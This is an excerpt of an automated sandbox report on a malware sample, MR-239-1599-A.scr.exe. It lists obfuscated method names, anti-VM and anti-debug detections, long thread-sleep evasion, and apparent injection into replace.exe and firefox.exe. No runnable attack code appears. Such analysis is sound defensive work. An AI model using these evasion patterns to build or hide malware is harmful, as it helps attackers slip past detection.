                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, UG6td3llIR9rgOKs6jX.csHigh entropy of concatenated method names: 'ToString', 'Mh3pRrRuYQ', 'ikVpOSSvCZ', 'FcKpKnk9pw', 'OfCpouflbi', 'yeYp7rwUHY', 'PpmpAuX6lv', 'W2wpNNVZCj', 'P2gVdFm8rlcobIP19Y4', 'X5EuRSmqk0fByivspS8'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.csHigh entropy of concatenated method names: 'eTARKr6OGS', 'VXIRo8wwpX', 'i62R7AHh5j', 'XOuRAW4fWA', 'jZ0RNemBwe', 'YotRrW1RDn', 'dvcR1AjE78', 'a4mRdwvjkH', 'dBGRubcLC2', 'qNIRgPsnhe'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, rOV05hdnMaAwoBl9VE.csHigh entropy of concatenated method names: 'gh4txmaOnM', 'prsthVtHJd', 'zn0tUV7ImS', 'C9PtPhcNdc', 'h5mtbgkd37', 'fxttDs1WKX', 'nWPtVnc2El', 'Y75tQHseUG', 'QQptjXc9D9', 'T5LtfF8m5e'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, pHbTOilnNQERVelq1Nj.csHigh entropy of concatenated method names: 'SCTwcVWh9P', 'BF1w26dIYL', 'opxwFefsTV', 'YnuwH0khrl', 'dDSwGecSvb', 'bfrwY62fTa', 'mcgwayFaRl', 'rQww3TnXh1', 'TCrwv2nGy4', 'krowqN1Erj'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, gfiBMJyWKejJe42fYy.csHigh entropy of concatenated method names: 'Jh87Uogr84', 'eUS7Plyg2W', 'hbV7mSXctj', 'Xhj7L3lAHc', 'kpp7MKrKTr', 'oGX7nyq28f', 'ggn7e9N1VI', 'Euy7WZDWt4', 'a4V7saBgGR', 'sXb7X1ZISI'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, gYKgd0MLh6yXr5VUv7.csHigh entropy of concatenated method names: 'OMBw9idA4a', 'r7IwROhpql', 'vCZwO9uBeL', 'UASwoa7ZfF', 'ghww7JxR9y', 'WwOwNgNIWY', 'ujtwr12qgc', 'tcqTeLPNkX', 'LhiTWfnHKQ', 'DCtTsb7uCk'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, WenmsXZSyAlyLHifLm.csHigh entropy of concatenated method names: 'CnDAHjK6K5', 'KV8AY3yZ2i', 'kh0A3UgYoH', 'BoQAvmmxZ5', 'OaDAtSHyBw', 'cI4A4JsNll', 'XqBAIoVUAe', 'UvAAT1LSN1', 'fBVAwtC7kO', 'VbVApbbTV9'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, ICg2D8UVrD90QdAE7q.csHigh entropy of concatenated method names: 'NYS91uMEac', 'Nli9dvLEGO', 'tF69g6miqK', 'f9S9BGwvVy', 'vh59tU5Yad', 'HRv94LcPCZ', 'Haj7ptMnh5xuH9bJFv', 'Gvpfrx44eOyuhUah2Y', 'CxV99pfpwG', 'kgM9R5qxX7'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, cVp9pOw4ANeBGqIjQl.csHigh entropy of concatenated method names: 'oXp1ocUooF', 'MV11AQ0WDk', 'XMC1rcgb0H', 'w20rXsTZyZ', 'cQBrzU3gM2', 'x4E1695jvZ', 'fUJ19iKuAd', 'uYQ1lR7oK0', 'kvR1R2Logy', 'gG31OvQyt6'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, SRhXgb0DVNYSBAXbY9.csHigh entropy of concatenated method names: 'oq7rK2yaiX', 'Ncfr7Dv0Vw', 'dUXrN9OcgX', 'Rtbr1dSERL', 'C81rdMtUbx', 'A2qNMFW0i7', 'bYvNnC6MWK', 'n7CNe5qy0I', 'WdkNW8epWR', 'kANNsT7ZcD'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, TLbrSjzEKrBfQYgva3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NkgwZ2ldmd', 'qtlwtoKC8i', 'r9Gw4OadNQ', 'C5owIjJsLb', 'RZrwTMSHTW', 'B8cwwj1vJ7', 'qcDwpREaBQ'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, MLP0hfDV1Bw7qEXpZX.csHigh entropy of concatenated method names: 'dfnNGB9U9l', 'w4mNaU4QKc', 'hhvADLCb53', 'jivAVKW28a', 'n6uAQoUN3S', 'CGAAjEVu7e', 'rnqAf4ASOU', 'KxeA0hnI3y', 'OGmAi44HtP', 'k3HAx26Cy1'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, RLFqHSalOrbFLciQf7.csHigh entropy of concatenated method names: 'Hr8FQd5nT', 'rF1HwNJmb', 'QfsYcDpBs', 'GlVadgYW5', 'P1yvq8rmD', 'ny5qVSbyq', 'vZXlyLUvUK8dwQiLVt', 'cZdwF05HTXLW6WquiT', 'V7mTqTqMx', 'bIDpk0vY6'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, MxwruClEusiXWiZ7Wr9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U2lpUCfiip', 'AnWpPnbKSw', 'dKgpmnlYQN', 'LfDpLMafEf', 'PRkpM8JW2v', 'OuIpneDwuy', 'zanpeZ7Iow'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, MJt63Q3lLf7UpSTfT7.csHigh entropy of concatenated method names: 'g0YIWPr6l4', 'DApIXmceuX', 'JcyT6p5SfC', 'pmrT9HFC3F', 'yBXI5uPuty', 'LLLIhfDh24', 'YgaI83sTLv', 'yQyIU4iA4t', 'YdyIPllPbx', 'PcHImWs5rF'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, bvbg2yKHFkEHYVFsdT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mB8lsPhtrI', 'nCnlXkmHNP', 'f2DlzFTUQd', 'BKqR65V3I4', 'R4dR9c1YeT', 'q7QRlE7Cnp', 'ThDRRkdFtN', 'uI1nLF96oWJYAquFkm9'
                  Source: 0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, jeGWLloVI2hnVphZ5y.csHigh entropy of concatenated method names: 'Dispose', 'nkY9sajxcR', 'UVhlbj7kKS', 'RCmSSKZIFW', 'ntO9XxgnaZ', 'nXp9z3WFTI', 'ProcessDialogKey', 'guql644pJ8', 'yDwl9SCpP2', 'J8TllXH0yf'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, f5UW06mjXs7jtxJbWe.csHigh entropy of concatenated method names: 'wgoTo1shwf', 'GNdT7O3r7c', 'i9hTA6vxDC', 'dMdTNyCjeJ', 'dB8Truk2uH', 'oo2T1veB0D', 'zv7Td1wu9M', 'YgaTuys0XS', 'GmlTgwdUZI', 'utdTBmkp2j'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, EWZS8KgBQ1SjXUPd3s.csHigh entropy of concatenated method names: 'cf2TC42oI1', 'UmxTb8GKYZ', 'AdYTDpGtvt', 'u5CTVpJfyn', 'WWgTUHS1HC', 'vY7TQpdCil', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, YfbHw9A3OWheUacCwH.csHigh entropy of concatenated method names: 'iIP1cfg2V8', 'sOk1292TIf', 'B6V1FcijeJ', 'Qnj1HIORRc', 'rwh1G1jMwj', 'Wav1YRabu1', 'ukf1aCumFZ', 'TWr135bfic', 'jrF1vCyXLe', 'Cf61qsa2at'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, jt9KnjxnASqP3WYaln.csHigh entropy of concatenated method names: 'xwDZ3jQSj3', 'xguZvSFtlZ', 'URWZCu4CWD', 'CCKZb8L4nC', 'PDNZVQixIn', 'ecbZQFQxVL', 'zIJZfvIe68', 'T8qZ0pMMSw', 'c6PZxWT37Z', 'wd3Z5hNdlX'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, UG6td3llIR9rgOKs6jX.csHigh entropy of concatenated method names: 'ToString', 'Mh3pRrRuYQ', 'ikVpOSSvCZ', 'FcKpKnk9pw', 'OfCpouflbi', 'yeYp7rwUHY', 'PpmpAuX6lv', 'W2wpNNVZCj', 'P2gVdFm8rlcobIP19Y4', 'X5EuRSmqk0fByivspS8'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.csHigh entropy of concatenated method names: 'eTARKr6OGS', 'VXIRo8wwpX', 'i62R7AHh5j', 'XOuRAW4fWA', 'jZ0RNemBwe', 'YotRrW1RDn', 'dvcR1AjE78', 'a4mRdwvjkH', 'dBGRubcLC2', 'qNIRgPsnhe'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, rOV05hdnMaAwoBl9VE.csHigh entropy of concatenated method names: 'gh4txmaOnM', 'prsthVtHJd', 'zn0tUV7ImS', 'C9PtPhcNdc', 'h5mtbgkd37', 'fxttDs1WKX', 'nWPtVnc2El', 'Y75tQHseUG', 'QQptjXc9D9', 'T5LtfF8m5e'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, pHbTOilnNQERVelq1Nj.csHigh entropy of concatenated method names: 'SCTwcVWh9P', 'BF1w26dIYL', 'opxwFefsTV', 'YnuwH0khrl', 'dDSwGecSvb', 'bfrwY62fTa', 'mcgwayFaRl', 'rQww3TnXh1', 'TCrwv2nGy4', 'krowqN1Erj'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, gfiBMJyWKejJe42fYy.csHigh entropy of concatenated method names: 'Jh87Uogr84', 'eUS7Plyg2W', 'hbV7mSXctj', 'Xhj7L3lAHc', 'kpp7MKrKTr', 'oGX7nyq28f', 'ggn7e9N1VI', 'Euy7WZDWt4', 'a4V7saBgGR', 'sXb7X1ZISI'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, gYKgd0MLh6yXr5VUv7.csHigh entropy of concatenated method names: 'OMBw9idA4a', 'r7IwROhpql', 'vCZwO9uBeL', 'UASwoa7ZfF', 'ghww7JxR9y', 'WwOwNgNIWY', 'ujtwr12qgc', 'tcqTeLPNkX', 'LhiTWfnHKQ', 'DCtTsb7uCk'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, WenmsXZSyAlyLHifLm.csHigh entropy of concatenated method names: 'CnDAHjK6K5', 'KV8AY3yZ2i', 'kh0A3UgYoH', 'BoQAvmmxZ5', 'OaDAtSHyBw', 'cI4A4JsNll', 'XqBAIoVUAe', 'UvAAT1LSN1', 'fBVAwtC7kO', 'VbVApbbTV9'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, ICg2D8UVrD90QdAE7q.csHigh entropy of concatenated method names: 'NYS91uMEac', 'Nli9dvLEGO', 'tF69g6miqK', 'f9S9BGwvVy', 'vh59tU5Yad', 'HRv94LcPCZ', 'Haj7ptMnh5xuH9bJFv', 'Gvpfrx44eOyuhUah2Y', 'CxV99pfpwG', 'kgM9R5qxX7'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, cVp9pOw4ANeBGqIjQl.csHigh entropy of concatenated method names: 'oXp1ocUooF', 'MV11AQ0WDk', 'XMC1rcgb0H', 'w20rXsTZyZ', 'cQBrzU3gM2', 'x4E1695jvZ', 'fUJ19iKuAd', 'uYQ1lR7oK0', 'kvR1R2Logy', 'gG31OvQyt6'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, SRhXgb0DVNYSBAXbY9.csHigh entropy of concatenated method names: 'oq7rK2yaiX', 'Ncfr7Dv0Vw', 'dUXrN9OcgX', 'Rtbr1dSERL', 'C81rdMtUbx', 'A2qNMFW0i7', 'bYvNnC6MWK', 'n7CNe5qy0I', 'WdkNW8epWR', 'kANNsT7ZcD'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, TLbrSjzEKrBfQYgva3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NkgwZ2ldmd', 'qtlwtoKC8i', 'r9Gw4OadNQ', 'C5owIjJsLb', 'RZrwTMSHTW', 'B8cwwj1vJ7', 'qcDwpREaBQ'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, MLP0hfDV1Bw7qEXpZX.csHigh entropy of concatenated method names: 'dfnNGB9U9l', 'w4mNaU4QKc', 'hhvADLCb53', 'jivAVKW28a', 'n6uAQoUN3S', 'CGAAjEVu7e', 'rnqAf4ASOU', 'KxeA0hnI3y', 'OGmAi44HtP', 'k3HAx26Cy1'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, RLFqHSalOrbFLciQf7.csHigh entropy of concatenated method names: 'Hr8FQd5nT', 'rF1HwNJmb', 'QfsYcDpBs', 'GlVadgYW5', 'P1yvq8rmD', 'ny5qVSbyq', 'vZXlyLUvUK8dwQiLVt', 'cZdwF05HTXLW6WquiT', 'V7mTqTqMx', 'bIDpk0vY6'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, MxwruClEusiXWiZ7Wr9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U2lpUCfiip', 'AnWpPnbKSw', 'dKgpmnlYQN', 'LfDpLMafEf', 'PRkpM8JW2v', 'OuIpneDwuy', 'zanpeZ7Iow'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, MJt63Q3lLf7UpSTfT7.csHigh entropy of concatenated method names: 'g0YIWPr6l4', 'DApIXmceuX', 'JcyT6p5SfC', 'pmrT9HFC3F', 'yBXI5uPuty', 'LLLIhfDh24', 'YgaI83sTLv', 'yQyIU4iA4t', 'YdyIPllPbx', 'PcHImWs5rF'
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, bvbg2yKHFkEHYVFsdT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mB8lsPhtrI', 'nCnlXkmHNP', 'f2DlzFTUQd', 'BKqR65V3I4', 'R4dR9c1YeT', 'q7QRlE7Cnp', 'ThDRRkdFtN', 'uI1nLF96oWJYAquFkm9'
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: MR-239-1599-A.scr.exe PID: 7400, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: 7BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: 8BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: 8D90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: 9D90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E rdtsc 3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 9828Jump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeAPI coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 2.6 %
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe TID: 7420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060Thread sleep count: 145 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060Thread sleep time: -290000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060Thread sleep count: 9828 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\replace.exe TID: 8060Thread sleep time: -19656000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088Thread sleep time: -85000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088Thread sleep count: 42 > 30Jump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088Thread sleep time: -42000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe TID: 8088Thread sleep time: -40500s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C1BC00 FindFirstFileW,FindNextFileW,FindClose,6_2_02C1BC00
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: replace.exe, 00000006.00000002.4091676054.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4092704521.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2263980776.000002A0FEA6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E rdtsc 3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00417673 LdrLoadDll,3_2_00417673
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01588158 mov eax, dword ptr fs:[00000030h]3_2_01588158
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EC156 mov eax, dword ptr fs:[00000030h]3_2_014EC156
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6154 mov eax, dword ptr fs:[00000030h]3_2_014F6154
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6154 mov eax, dword ptr fs:[00000030h]3_2_014F6154
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01584144 mov eax, dword ptr fs:[00000030h]3_2_01584144
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01584144 mov eax, dword ptr fs:[00000030h]3_2_01584144
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01584144 mov ecx, dword ptr fs:[00000030h]3_2_01584144
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01584144 mov eax, dword ptr fs:[00000030h]3_2_01584144
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01584144 mov eax, dword ptr fs:[00000030h]3_2_01584144
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4164 mov eax, dword ptr fs:[00000030h]3_2_015C4164
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4164 mov eax, dword ptr fs:[00000030h]3_2_015C4164
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159A118 mov ecx, dword ptr fs:[00000030h]3_2_0159A118
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159A118 mov eax, dword ptr fs:[00000030h]3_2_0159A118
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159A118 mov eax, dword ptr fs:[00000030h]3_2_0159A118
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159A118 mov eax, dword ptr fs:[00000030h]3_2_0159A118
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B0115 mov eax, dword ptr fs:[00000030h]3_2_015B0115
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov eax, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov ecx, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov eax, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov eax, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov ecx, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov eax, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov eax, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov ecx, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov eax, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159E10E mov ecx, dword ptr fs:[00000030h]3_2_0159E10E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01520124 mov eax, dword ptr fs:[00000030h]3_2_01520124
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E1D0 mov eax, dword ptr fs:[00000030h]3_2_0156E1D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E1D0 mov eax, dword ptr fs:[00000030h]3_2_0156E1D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0156E1D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E1D0 mov eax, dword ptr fs:[00000030h]3_2_0156E1D0
